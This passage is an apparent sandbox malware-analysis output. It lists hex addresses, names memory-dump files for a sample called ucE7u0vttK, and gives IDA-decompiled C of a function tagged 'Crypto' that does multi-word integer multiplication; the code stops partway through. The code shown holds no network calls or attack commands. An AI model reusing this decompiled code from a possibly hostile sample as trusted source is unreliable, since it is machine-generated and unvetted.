    0x003ae47b
    0x003ae47b
    0x003ae481
    0x003ae485
    0x003ae48d
    0x003ae494
    0x003ae496
    0x00000000
    0x003ae4a6
    0x003ae4a6
    0x003ae4a9
    0x003ae4ac
    0x003ae4b1
    0x003ae4be
    0x003ae4c2
    0x003ae4cd
    0x003ae4cd
    0x003ae4d4
    0x003ae4da
    0x00000000
    0x003ae4dc
    0x003ae4df
    0x003ae517
    0x003ae51a
    0x003ae526
    0x003ae530
    0x003ae539
    0x003ae53d
    0x003ae540
    0x003ae545
    0x003ae549
    0x003ae54c
    0x00000000
    0x00000000
    0x003ae552
    0x003ae554
    0x00000000
    0x00000000
    0x003ae55a
    0x003ae55c
    0x00000000
    0x00000000
    0x003ae562
    0x003ae564
    0x00000000
    0x00000000
    0x003ae56a
    0x003ae572
    0x003ae572
    0x003ae577
    0x003ae57d
    0x003ae57d
    0x003ae57d
    0x003ae580
    0x003ae581
    0x003ae586
    0x003ae58e
    0x003ae590
    0x00000000
    0x003ae596
    0x003ae596
    0x003ae5a1
    0x003ae5a5
    0x003ae5ad
    0x003ae5af
    0x00000000
    0x00000000
    0x003ae5b5
    0x003ae5b9
    0x003ae5bd
    0x003ae632
    0x003ae632
    0x003ae635
    0x003ae63b
    0x003ae63d
    0x003ae63f
    0x003ae643
    0x003ae648
    0x003ae650
    0x003ae659
    0x003ae65c
    0x003ae660
    0x003ae663
    0x003ae666
    0x003ae669
    0x003ae66c
    0x003ae66f
    0x003ae67b
    0x003ae671
    0x003ae671
    0x003ae671
    0x003ae688
    0x003ae694
    0x003ae697
    0x003ae69a
    0x003ae69d
    0x003ae6a0
    0x003ae6ab
    0x003ae6b0
    0x003ae6b3
    0x003ae6a2
    0x003ae6a2
    0x003ae6a2
    0x003ae6b6
    0x003ae6b8
    0x00000000
    0x003ae6be
    0x003ae6be
    0x003ae6c6
    0x003ae6cb
    0x003ae6d2
    0x003ae6d5
    0x003ae6d8
    0x003ae6db
    0x003ae6de
    0x003ae6ea
    0x003ae6ef
    0x003ae6f2
    0x003ae6e0
    0x003ae6e0
    0x003ae6e0
    0x003ae6f5
    0x003ae6f7
    0x00000000
    0x003ae6fd
    0x003ae6fd
    0x003ae701
    0x003ae703
    0x003ae709
    0x003ae70e
    0x003ae710
    0x003ae72e
    0x003ae731
    0x003ae731
    0x003ae731
    0x003ae712
    0x003ae715
    0x003ae71d
    0x003ae726
    0x003ae726
    0x003ae710
    0x003ae734
    0x003ae737
    0x003ae73b
    0x003ae743
    0x003ae743
    0x003ae743
    0x003ae73d
    0x003ae73d
    0x003ae73d
    0x003ae747
    0x003ae748
    0x003ae74a
    0x003ae866
    0x003ae866
    0x003ae869
    0x003ae86b
    0x003ae884
    0x003ae884
    0x003ae88a
    0x003ae890
    0x003ae898
    0x003ae89b
    0x003ae89d
    0x003ae89d
    0x003ae8a0
    0x003ae8a3
    0x003ae8c6
    0x003ae8c9
    0x00000000
    0x003ae8c9
    0x003ae8a5
    0x003ae8a8
    0x003ae8ab
    0x003ae8ad
    0x00000000
    0x00000000
    0x003ae8b1
    0x003ae8b5
    0x003ae8b5
    0x003ae8b7
    0x003ae8ba
    0x003ae8bc
    0x00000000
    0x00000000
    0x003ae8be
    0x003ae8c1
    0x003ae8c4
    0x00000000
    0x00000000
    0x00000000
    0x003ae8c4
    0x00000000
    0x003ae8b5
    0x003ae86f
    0x003ae873
    0x003ae873
    0x003ae875
    0x003ae878
    0x003ae87a
    0x00000000
    0x00000000
    0x003ae87c
    0x003ae87f
    0x003ae882
    0x00000000
    0x00000000
    0x00000000
    0x003ae882
    0x00000000
    0x003ae750
    0x003ae753
    0x003ae753
    0x003ae756
    0x003ae759
    0x003ae75c
    0x003ae75c
    0x003ae75f
    0x003ae761
    0x003ae764
    0x003ae767
    0x003ae776
    0x003ae785
    0x003ae78d
    0x003ae790
    0x003ae793
    0x003ae796
    0x003ae799
    0x003ae79c
    0x003ae7a1
    0x003ae7a8
    0x003ae7ad
    0x003ae7b1
    0x003ae7b5
    0x003ae7b7
    0x003ae7ba
    0x003ae7bc
    0x003ae7be
    0x003ae7be
    0x003ae7be
    0x003ae7c5
    0x003ae7cb
    0x003ae7cd
    0x003ae7cf
    0x003ae7d1
    0x003ae7d3
    0x003ae7d3
    0x003ae7d3
    0x003ae7d4
    0x003ae7f7
    0x003ae7f7
    0x003ae7f9
    0x00000000
    0x00000000
    0x003ae7d9
    0x003ae7e3
    0x003ae7e3
    0x003ae7e6
    0x003ae7e9
    0x003ae7ec
    0x00000000
    0x00000000
    0x003ae7ee
    0x003ae7f1
    0x003ae7f3
    0x003ae7f3
    0x003ae7f3
    0x003ae7f4
    0x003ae7f4
    0x00000000
    0x003ae7f4
    0x003ae7db
    0x003ae7de
    0x003ae7e1
    0x00000000
    0x00000000
    0x00000000
    0x003ae7e1
    0x003ae7fb
    0x003ae7fb
    0x003ae809
    0x003ae813
    0x003ae81a
    0x003ae824
    0x003ae82b
    0x003ae82d
    0x003ae84b
    0x003ae84b
    0x00000000
    0x003ae84b
    0x003ae834
    0x003ae83a
    0x003ae840
    0x003ae842
    0x00000000
    0x00000000
    0x003ae844
    0x003ae847
    0x00000000
    0x003ae847
    0x003ae769
    0x00000000
    0x003ae84e
    0x003ae851
    0x003ae854
    0x003ae85a
    0x003ae85a
    0x003ae85a
    0x003ae85d
    0x003ae85d
    0x00000000
    0x003ae75c
    0x003ae74a
    0x003ae6f7
    0x003ae6b8
    0x003ae5bf
    0x003ae5c2
    0x003ae5c8
    0x003ae5ca
    0x003ae60b
    0x003ae60e
    0x003ae611
    0x003ae619
    0x003ae613
    0x003ae613
    0x003ae613
    0x003ae61e
    0x003ae620
    0x00000000
    0x003ae626
    0x003ae62b
    0x003ae62f
    0x003ae62f
    0x003ae62f
    0x00000000
    0x003ae62f
    0x003ae620
    0x003ae5cc
    0x003ae5cf
    0x003ae5d2
    0x003ae5da
    0x003ae5df
    0x003ae5d4
    0x003ae5d4
    0x003ae5d4
    0x003ae5e2
    0x003ae5e4
    0x00000000
    0x003ae5ea
    0x003ae5ea
    0x003ae5f6
    0x003ae5fc
    0x003ae5fe
    0x00000000
    0x00000000
    0x003ae5f1
    0x003ae5f5
    0x003ae5f5
    0x003ae5f5
    0x003ae606
    0x00000000
    0x003ae606
    0x003ae5e4
    0x003ae4ef
    0x003ae4fe
    0x00000000
    0x00000000
    0x003ae500
    0x003ae500
    0x00000000
    0x003ae500
    0x003ae4df
    0x003ae4da
    0x003ae4b9
    0x00000000
    0x00000000
    0x003ae4bb
    0x00000000
    0x003ae4bb
    0x003ae496
    0x003ae444
    0x003ae447
    0x003ae44a
    0x003ae44c
    0x00000000
    0x00000000
    0x003ae450
    0x003ae454
    0x003ae454
    0x003ae456
    0x003ae459
    0x003ae45b
    0x00000000
    0x00000000
    0x003ae45d
    0x003ae460
    0x003ae463
    0x00000000
    0x00000000
    0x00000000
    0x003ae463
    0x00000000
    0x003ae454
    0x003ae42a
    0x003ae42e
    0x003ae42e
    0x003ae430
    0x003ae433
    0x003ae435
    0x00000000
    0x00000000
    0x003ae437
    0x003ae43a
    0x003ae43d
    0x00000000
    0x00000000
    0x00000000
    0x003ae43d
    0x00000000
    0x003ae309
    0x003ae30c
    0x003ae30c
    0x003ae30f
    0x003ae312
    0x003ae315
    0x003ae315
    0x003ae318
    0x003ae31a
    0x003ae31d
    0x003ae320
    0x003ae32f
    0x003ae33e
    0x003ae346
    0x003ae349
    0x003ae34c
    0x003ae34f
    0x003ae352
    0x003ae355
    0x003ae35a
    0x003ae361
    0x003ae366
    0x003ae36a
    0x003ae36e
    0x003ae370
    0x003ae373
    0x003ae375
    0x003ae377
    0x003ae377
    0x003ae377
    0x003ae37e
    0x003ae384
    0x003ae386
    0x003ae388
    0x003ae38a
    0x003ae38c
    0x003ae38c
    0x003ae38c
    0x003ae38d
    0x003ae3b0
    0x003ae3b0
    0x003ae3b2
    0x00000000
    0x00000000
    0x003ae392
    0x003ae39c
    0x003ae39c
    0x003ae39f
    0x003ae3a2
    0x003ae3a5
    0x00000000
    0x00000000
    0x003ae3a7
    0x003ae3aa
    0x003ae3ac
    0x003ae3ac
    0x003ae3ac
    0x003ae3ad
    0x003ae3ad
    0x00000000
    0x003ae3ad
    0x003ae394
    0x003ae397
    0x003ae39a
    0x00000000
    0x00000000
    0x00000000
    0x003ae39a
    0x003ae3b4
    0x003ae3b4
    0x003ae3c2
    0x003ae3cc
    0x003ae3d3
    0x003ae3dd
    0x003ae3e4
    0x003ae3e6
    0x003ae404
    0x003ae404
    0x00000000
    0x003ae404
    0x003ae3ed
    0x003ae3f3
    0x003ae3f9
    0x003ae3fb
    0x00000000
    0x00000000
    0x003ae3fd
    0x003ae400
    0x00000000
    0x003ae400
    0x003ae322
    0x00000000
    0x003ae407
    0x003ae40d
    0x003ae413
    0x003ae413
    0x003ae413
    0x003ae416
    0x003ae416
    0x00000000
    0x003ae315
    0x003ae303
    0x003ae2b0
    0x003ae272
    0x003ae187
    0x003ae18a
    0x003ae190
    0x003ae192
    0x003ae1d3
    0x003ae1d6
    0x003ae1d9
    0x003ae1e1
    0x003ae1db
    0x003ae1db
    0x003ae1db
    0x003ae1e6
    0x003ae1e8
    0x00000000
    0x003ae1ee
    0x003ae1f3
    0x003ae1f7
    0x003ae1f7
    0x003ae1f7
    0x00000000
    0x003ae1f7
    0x003ae1e8
    0x003ae194
    0x003ae197
    0x003ae19a
    0x003ae1a2
    0x003ae1a7
    0x003ae19c
    0x003ae19c
    0x003ae19c
    0x003ae1aa
    0x003ae1ac
    0x00000000
    0x003ae1b2
    0x003ae1b2
    0x003ae1be
    0x003ae1c4
    0x003ae1c6
    0x00000000
    0x00000000
    0x003ae1b9
    0x003ae1bd
    0x003ae1bd
    0x003ae1bd
    0x003ae1ce
    0x00000000
    0x003ae1ce
    0x003ae1ac
    0x003ae15b
    0x003ae0d2
    0x003ae0d5
    0x003ae0e1
    0x00000000
    0x00000000
    0x003ae0e7
    0x00000000
    0x003ae0e7
    0x003ae0c6
    0x003ae0a6
    0x00000000
    0x00000000
    0x003ae0ac
    0x00000000
    0x003ae0ac

    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A9885, Relevance: .6, Instructions: 641Crypto
    C-Code - Quality: 100%
    			E003A9885(void* __eax, void* __ecx, void* __esi) {
				void* _t331;
				unsigned int _t332;
				signed int _t333;
				void* _t338;
				void* _t340;
				void* _t341;
				void* _t342;
				signed int _t343;
				void* _t345;
				void* _t346;
				void* _t347;
				signed int _t348;
				void* _t350;
				void* _t351;
				void* _t352;
				signed int _t353;
				signed int _t354;
				void* _t356;
				signed int _t358;
				void* _t360;
				signed int _t362;
				signed int _t363;
				void* _t364;
				signed int _t366;
				signed int _t367;
				void* _t368;
				signed int _t370;
				signed int _t371;
				void* _t372;
				signed int _t375;
				signed int _t376;
				void* _t377;
				signed int _t379;
				signed int _t380;
				void* _t381;
				signed int _t383;
				signed int _t384;
				void* _t385;
				signed int _t387;
				void* _t389;
				signed int _t391;
				signed int _t392;
				void* _t393;
				signed int _t395;
				signed int _t396;
				void* _t397;
				signed int _t400;
				signed int _t401;
				void* _t402;
				signed int _t404;
				signed int _t405;
				void* _t406;
				signed int _t408;
				void* _t410;
				signed int _t412;
				signed int _t413;
				void* _t414;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				void* _t422;
				void* _t424;
				intOrPtr _t426;
				unsigned int _t427;
				signed int _t428;
				void* _t430;
				unsigned int _t433;
				signed int _t434;
				void* _t435;
				unsigned int _t438;
				signed int _t439;
				void* _t440;
				unsigned int _t443;
				signed int _t444;
				void* _t445;
				intOrPtr _t447;
				unsigned int _t450;
				signed int _t451;
				void* _t452;
				unsigned int _t455;
				signed int _t456;
				void* _t457;
				unsigned int _t460;
				signed int _t461;
				void* _t462;
				intOrPtr _t464;
				unsigned int _t465;
				signed int _t466;
				void* _t468;
				unsigned int _t471;
				signed int _t472;
				void* _t473;
				unsigned int _t476;
				signed int _t477;
				void* _t478;
				intOrPtr _t480;
				unsigned int _t483;
				signed int _t484;
				void* _t485;
				unsigned int _t488;
				signed int _t489;
				void* _t490;
				intOrPtr _t492;
				unsigned int _t493;
				signed int _t494;
				void* _t496;
				unsigned int _t499;
				signed int _t500;
				void* _t501;
				intOrPtr _t503;
				unsigned int _t506;
				signed int _t507;
				signed int _t508;
				intOrPtr _t510;
				signed int _t512;
				signed int _t513;
				signed int _t516;
				signed int _t518;
				signed int _t521;
				signed int _t523;
				signed int _t526;
				signed int _t528;
				signed int _t531;
				signed int _t533;
				signed int _t536;
				signed int _t538;
				signed int _t541;
				signed int _t543;
				signed int _t548;
				signed int _t550;
				signed int _t553;
				signed int _t555;
				signed int _t558;
				signed int _t560;
				signed int _t563;
				signed int _t565;
				signed int _t570;
				signed int _t572;
				signed int _t575;
				signed int _t577;
				void* _t581;
				void* _t582;
				intOrPtr _t583;
				void* _t585;
				unsigned int _t587;
				signed int _t588;
				signed int _t589;
				signed int _t590;
				void* _t591;
				signed int _t592;
				signed int _t593;
				void* _t594;
				signed int _t595;
				signed int _t596;
				void* _t597;
				signed int _t598;
				signed int _t599;
				void* _t600;
				signed int _t601;
				signed int _t602;
				void* _t603;
				signed int _t604;
				signed int _t605;
				void* _t606;
				unsigned int _t608;
				signed int _t609;
				signed int _t610;
				signed int _t611;
				void* _t612;
				signed int _t613;
				signed int _t614;
				void* _t615;
				signed int _t616;
				signed int _t617;
				void* _t618;
				signed int _t619;
				signed int _t620;
				void* _t621;
				unsigned int _t623;
				signed int _t624;
				signed int _t625;
				signed int _t626;
				void* _t627;
				signed int _t628;
				signed int _t629;
				void* _t630;
				signed int _t631;
				void* _t633;

				_t585 = __esi;
				_t356 = __ecx;
				_t331 = __eax;
				_t424 = __ecx;
				if( *(_t633 - 4) < __esi) {
					_t424 = __ecx + 1;
				}
				_t340 =  *(_t633 - 0xc) + _t424;
				if(_t340 < _t424) {
					 *(_t633 - 8) =  *(_t633 - 8) + 1;
				}
				_t426 =  *(_t633 - 4) + _t585;
				if(_t426 < _t585) {
					_t356 = _t356 + 1;
				}
				_t341 = _t340 + _t356;
				if(_t341 < _t356) {
					 *(_t633 - 8) =  *(_t633 - 8) + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) & 0x00000000;
				 *((intOrPtr*)( *(_t633 + 8) + 0x1c)) = _t426;
				_t427 =  *(_t331 + 0x10);
				_t358 = _t427 & 0x0000ffff;
				_t428 = _t427 >> 0x10;
				_t587 = _t358 * _t428;
				_t588 = _t587 << 0x11;
				_t360 = _t358 * _t358 + _t588;
				_t430 = _t428 * _t428 + (_t587 >> 0xf);
				if(_t360 < _t588) {
					_t430 = _t430 + 1;
				}
				_t342 = _t341 + _t360;
				if(_t342 < _t360) {
					_t430 = _t430 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t430;
				if( *(_t633 - 8) < _t430) {
					 *(_t633 - 4) = 1;
				}
				_t516 =  *(_t331 + 0xc) & 0x0000ffff;
				_t589 =  *(_t331 + 0x14) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 0xe) & 0x0000ffff;
				_t362 =  *(_t331 + 0x16) & 0x0000ffff;
				_t590 = _t589 * _t516;
				 *(_t633 - 0x14) = _t516;
				_t363 = _t362 *  *(_t633 - 0x10);
				_t518 = _t362 *  *(_t633 - 0x14);
				_t433 = _t589 *  *(_t633 - 0x10) + _t518;
				if(_t433 < _t518) {
					_t363 = _t363 + 0x10000;
				}
				_t434 = _t433 << 0x10;
				_t591 = _t590 + _t434;
				_t364 = _t363 + (_t433 >> 0x10);
				if(_t591 < _t434) {
					_t364 = _t364 + 1;
				}
				_t343 = _t342 + _t591;
				_t435 = _t364;
				 *(_t633 - 0xc) = _t343;
				if(_t343 < _t591) {
					_t435 = _t364 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t435;
				if( *(_t633 - 8) < _t435) {
					 *(_t633 - 4) =  *(_t633 - 4) + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t591;
				if( *(_t633 - 0xc) < _t591) {
					_t364 = _t364 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t364;
				if( *(_t633 - 8) < _t364) {
					 *(_t633 - 4) =  *(_t633 - 4) + 1;
				}
				_t521 =  *(_t331 + 8) & 0x0000ffff;
				_t592 =  *(_t331 + 0x18) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 0xa) & 0x0000ffff;
				_t366 =  *(_t331 + 0x1a) & 0x0000ffff;
				_t593 = _t592 * _t521;
				 *(_t633 - 0x14) = _t521;
				_t367 = _t366 *  *(_t633 - 0x10);
				_t523 = _t366 *  *(_t633 - 0x14);
				_t438 = _t592 *  *(_t633 - 0x10) + _t523;
				if(_t438 < _t523) {
					_t367 = _t367 + 0x10000;
				}
				_t439 = _t438 << 0x10;
				_t594 = _t593 + _t439;
				_t368 = _t367 + (_t438 >> 0x10);
				if(_t594 < _t439) {
					_t368 = _t368 + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t594;
				_t440 = _t368;
				if( *(_t633 - 0xc) < _t594) {
					_t440 = _t368 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t440;
				if( *(_t633 - 8) < _t440) {
					 *(_t633 - 4) =  *(_t633 - 4) + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t594;
				if( *(_t633 - 0xc) < _t594) {
					_t368 = _t368 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t368;
				if( *(_t633 - 8) < _t368) {
					 *(_t633 - 4) =  *(_t633 - 4) + 1;
				}
				_t526 =  *(_t331 + 4) & 0x0000ffff;
				_t595 =  *(_t331 + 0x1c) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 6) & 0x0000ffff;
				_t370 =  *(_t331 + 0x1e) & 0x0000ffff;
				_t596 = _t595 * _t526;
				 *(_t633 - 0x14) = _t526;
				_t371 = _t370 *  *(_t633 - 0x10);
				_t528 = _t370 *  *(_t633 - 0x14);
				_t443 = _t595 *  *(_t633 - 0x10) + _t528;
				if(_t443 < _t528) {
					_t371 = _t371 + 0x10000;
				}
				_t444 = _t443 << 0x10;
				_t597 = _t596 + _t444;
				_t372 = _t371 + (_t443 >> 0x10);
				if(_t597 < _t444) {
					_t372 = _t372 + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t597;
				_t445 = _t372;
				if( *(_t633 - 0xc) < _t597) {
					_t445 = _t372 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t445;
				if( *(_t633 - 8) < _t445) {
					 *(_t633 - 4) =  *(_t633 - 4) + 1;
				}
				_t447 =  *(_t633 - 0xc) + _t597;
				if(_t447 < _t597) {
					_t372 = _t372 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t372;
				if( *(_t633 - 8) < _t372) {
					 *(_t633 - 4) =  *(_t633 - 4) + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) & 0x00000000;
				 *((intOrPtr*)( *(_t633 + 8) + 0x20)) = _t447;
				_t531 =  *(_t331 + 8) & 0x0000ffff;
				_t598 =  *(_t331 + 0x1c) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 0xa) & 0x0000ffff;
				_t375 =  *(_t331 + 0x1e) & 0x0000ffff;
				_t599 = _t598 * _t531;
				 *(_t633 - 0x14) = _t531;
				_t376 = _t375 *  *(_t633 - 0x10);
				_t533 = _t375 *  *(_t633 - 0x14);
				_t450 = _t598 *  *(_t633 - 0x10) + _t533;
				if(_t450 < _t533) {
					_t376 = _t376 + 0x10000;
				}
				_t451 = _t450 << 0x10;
				_t600 = _t599 + _t451;
				_t377 = _t376 + (_t450 >> 0x10);
				if(_t600 < _t451) {
					_t377 = _t377 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t600;
				_t452 = _t377;
				if( *(_t633 - 8) < _t600) {
					_t452 = _t377 + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) + _t452;
				if( *(_t633 - 4) < _t452) {
					 *(_t633 - 0xc) = 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t600;
				if( *(_t633 - 8) < _t600) {
					_t377 = _t377 + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) + _t377;
				if( *(_t633 - 4) < _t377) {
					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
				}
				_t536 =  *(_t331 + 0xc) & 0x0000ffff;
				_t601 =  *(_t331 + 0x18) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 0xe) & 0x0000ffff;
				_t379 =  *(_t331 + 0x1a) & 0x0000ffff;
				_t602 = _t601 * _t536;
				 *(_t633 - 0x14) = _t536;
				_t380 = _t379 *  *(_t633 - 0x10);
				_t538 = _t379 *  *(_t633 - 0x14);
				_t455 = _t601 *  *(_t633 - 0x10) + _t538;
				if(_t455 < _t538) {
					_t380 = _t380 + 0x10000;
				}
				_t456 = _t455 << 0x10;
				_t603 = _t602 + _t456;
				_t381 = _t380 + (_t455 >> 0x10);
				if(_t603 < _t456) {
					_t381 = _t381 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t603;
				_t457 = _t381;
				if( *(_t633 - 8) < _t603) {
					_t457 = _t381 + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) + _t457;
				if( *(_t633 - 4) < _t457) {
					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t603;
				if( *(_t633 - 8) < _t603) {
					_t381 = _t381 + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) + _t381;
				if( *(_t633 - 4) < _t381) {
					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
				}
				_t541 =  *(_t331 + 0x10) & 0x0000ffff;
				_t604 =  *(_t331 + 0x14) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 0x12) & 0x0000ffff;
				_t383 =  *(_t331 + 0x16) & 0x0000ffff;
				_t605 = _t604 * _t541;
				 *(_t633 - 0x14) = _t541;
				_t384 = _t383 *  *(_t633 - 0x10);
				_t543 = _t383 *  *(_t633 - 0x14);
				_t460 = _t604 *  *(_t633 - 0x10) + _t543;
				if(_t460 < _t543) {
					_t384 = _t384 + 0x10000;
				}
				_t461 = _t460 << 0x10;
				_t606 = _t605 + _t461;
				_t385 = _t384 + (_t460 >> 0x10);
				if(_t606 < _t461) {
					_t385 = _t385 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t606;
				_t462 = _t385;
				if( *(_t633 - 8) < _t606) {
					_t462 = _t385 + 1;
				}
				_t345 =  *(_t633 - 4) + _t462;
				if(_t345 < _t462) {
					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
				}
				_t464 =  *(_t633 - 8) + _t606;
				if(_t464 < _t606) {
					_t385 = _t385 + 1;
				}
				_t346 = _t345 + _t385;
				if(_t346 < _t385) {
					 *(_t633 - 0xc) =  *(_t633 - 0xc) + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) & 0x00000000;
				 *((intOrPtr*)( *(_t633 + 8) + 0x24)) = _t464;
				_t465 =  *(_t331 + 0x14);
				_t387 = _t465 & 0x0000ffff;
				_t466 = _t465 >> 0x10;
				_t608 = _t387 * _t466;
				_t609 = _t608 << 0x11;
				_t389 = _t387 * _t387 + _t609;
				_t468 = _t466 * _t466 + (_t608 >> 0xf);
				if(_t389 < _t609) {
					_t468 = _t468 + 1;
				}
				_t347 = _t346 + _t389;
				if(_t347 < _t389) {
					_t468 = _t468 + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t468;
				if( *(_t633 - 0xc) < _t468) {
					 *(_t633 - 8) = 1;
				}
				_t548 =  *(_t331 + 0x10) & 0x0000ffff;
				_t610 =  *(_t331 + 0x18) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 0x12) & 0x0000ffff;
				_t391 =  *(_t331 + 0x1a) & 0x0000ffff;
				_t611 = _t610 * _t548;
				 *(_t633 - 0x14) = _t548;
				_t392 = _t391 *  *(_t633 - 0x10);
				_t550 = _t391 *  *(_t633 - 0x14);
				_t471 = _t610 *  *(_t633 - 0x10) + _t550;
				if(_t471 < _t550) {
					_t392 = _t392 + 0x10000;
				}
				_t472 = _t471 << 0x10;
				_t612 = _t611 + _t472;
				_t393 = _t392 + (_t471 >> 0x10);
				if(_t612 < _t472) {
					_t393 = _t393 + 1;
				}
				_t348 = _t347 + _t612;
				_t473 = _t393;
				 *(_t633 - 4) = _t348;
				if(_t348 < _t612) {
					_t473 = _t393 + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t473;
				if( *(_t633 - 0xc) < _t473) {
					 *(_t633 - 8) =  *(_t633 - 8) + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) + _t612;
				if( *(_t633 - 4) < _t612) {
					_t393 = _t393 + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t393;
				if( *(_t633 - 0xc) < _t393) {
					 *(_t633 - 8) =  *(_t633 - 8) + 1;
				}
				_t553 =  *(_t331 + 0xc) & 0x0000ffff;
				_t613 =  *(_t331 + 0x1c) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 0xe) & 0x0000ffff;
				_t395 =  *(_t331 + 0x1e) & 0x0000ffff;
				_t614 = _t613 * _t553;
				 *(_t633 - 0x14) = _t553;
				_t396 = _t395 *  *(_t633 - 0x10);
				_t555 = _t395 *  *(_t633 - 0x14);
				_t476 = _t613 *  *(_t633 - 0x10) + _t555;
				if(_t476 < _t555) {
					_t396 = _t396 + 0x10000;
				}
				_t477 = _t476 << 0x10;
				_t615 = _t614 + _t477;
				_t397 = _t396 + (_t476 >> 0x10);
				if(_t615 < _t477) {
					_t397 = _t397 + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) + _t615;
				_t478 = _t397;
				if( *(_t633 - 4) < _t615) {
					_t478 = _t397 + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t478;
				if( *(_t633 - 0xc) < _t478) {
					 *(_t633 - 8) =  *(_t633 - 8) + 1;
				}
				_t480 =  *(_t633 - 4) + _t615;
				if(_t480 < _t615) {
					_t397 = _t397 + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t397;
				if( *(_t633 - 0xc) < _t397) {
					 *(_t633 - 8) =  *(_t633 - 8) + 1;
				}
				 *(_t633 - 4) =  *(_t633 - 4) & 0x00000000;
				 *((intOrPtr*)( *(_t633 + 8) + 0x28)) = _t480;
				_t558 =  *(_t331 + 0x10) & 0x0000ffff;
				_t616 =  *(_t331 + 0x1c) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 0x12) & 0x0000ffff;
				_t400 =  *(_t331 + 0x1e) & 0x0000ffff;
				_t617 = _t616 * _t558;
				 *(_t633 - 0x14) = _t558;
				_t401 = _t400 *  *(_t633 - 0x10);
				_t560 = _t400 *  *(_t633 - 0x14);
				_t483 = _t616 *  *(_t633 - 0x10) + _t560;
				if(_t483 < _t560) {
					_t401 = _t401 + 0x10000;
				}
				_t484 = _t483 << 0x10;
				_t618 = _t617 + _t484;
				_t402 = _t401 + (_t483 >> 0x10);
				if(_t618 < _t484) {
					_t402 = _t402 + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t618;
				_t485 = _t402;
				if( *(_t633 - 0xc) < _t618) {
					_t485 = _t402 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t485;
				if( *(_t633 - 8) < _t485) {
					 *(_t633 - 4) = 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t618;
				if( *(_t633 - 0xc) < _t618) {
					_t402 = _t402 + 1;
				}
				 *(_t633 - 8) =  *(_t633 - 8) + _t402;
				if( *(_t633 - 8) < _t402) {
					 *(_t633 - 4) =  *(_t633 - 4) + 1;
				}
				_t563 =  *(_t331 + 0x14) & 0x0000ffff;
				_t619 =  *(_t331 + 0x18) & 0x0000ffff;
				 *(_t633 - 0x10) =  *(_t331 + 0x16) & 0x0000ffff;
				_t404 =  *(_t331 + 0x1a) & 0x0000ffff;
				_t620 = _t619 * _t563;
				 *(_t633 - 0x14) = _t563;
				_t405 = _t404 *  *(_t633 - 0x10);
				_t565 = _t404 *  *(_t633 - 0x14);
				_t488 = _t619 *  *(_t633 - 0x10) + _t565;
				if(_t488 < _t565) {
					_t405 = _t405 + 0x10000;
				}
				_t489 = _t488 << 0x10;
				_t621 = _t620 + _t489;
				_t406 = _t405 + (_t488 >> 0x10);
				if(_t621 < _t489) {
					_t406 = _t406 + 1;
				}
				 *(_t633 - 0xc) =  *(_t633 - 0xc) + _t621;
				_t490 = _t406;
				if( *(_t633 - 0xc) < _t621) {
					_t490 = _t406 + 1;
				}
				_t350 =  *(_t633 - 8) + _t490;
				if(_t350 < _t490) {
					 *(_t633 - 4) =  *(_t633 - 4) + 1;
				}
				_t492 =  *(_t633 - 0xc) + _t621;
				if(_t492 < _t621) {
					_t406 = _t406 + 1;
				}
				_t351 = _t350 + _t406;
				if(_t351 < _t406) {
